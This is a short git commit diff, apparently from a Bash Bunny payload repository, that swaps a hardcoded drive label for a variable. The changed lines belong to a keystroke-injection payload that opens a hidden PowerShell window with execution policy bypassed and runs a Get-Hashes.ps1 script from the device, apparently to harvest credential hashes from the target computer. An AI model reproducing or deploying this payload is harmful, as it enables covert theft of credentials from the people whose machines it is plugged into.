Changed "BashBunny" to "${BB_LABEL}"

This commit is contained in:
KryptoKola
2022-12-29 21:48:23 -05:00
committed by GitHub
parent 9eda9728d0
commit 0189ae0fa8

View File

@@ -15,7 +15,7 @@ ATTACKMODE HID STORAGE
LED SETUP
GET SWITCH_POSITION
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel '${BB_LABEL}').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
Q DELAY 250
Q ENTER
Q DELAY 3000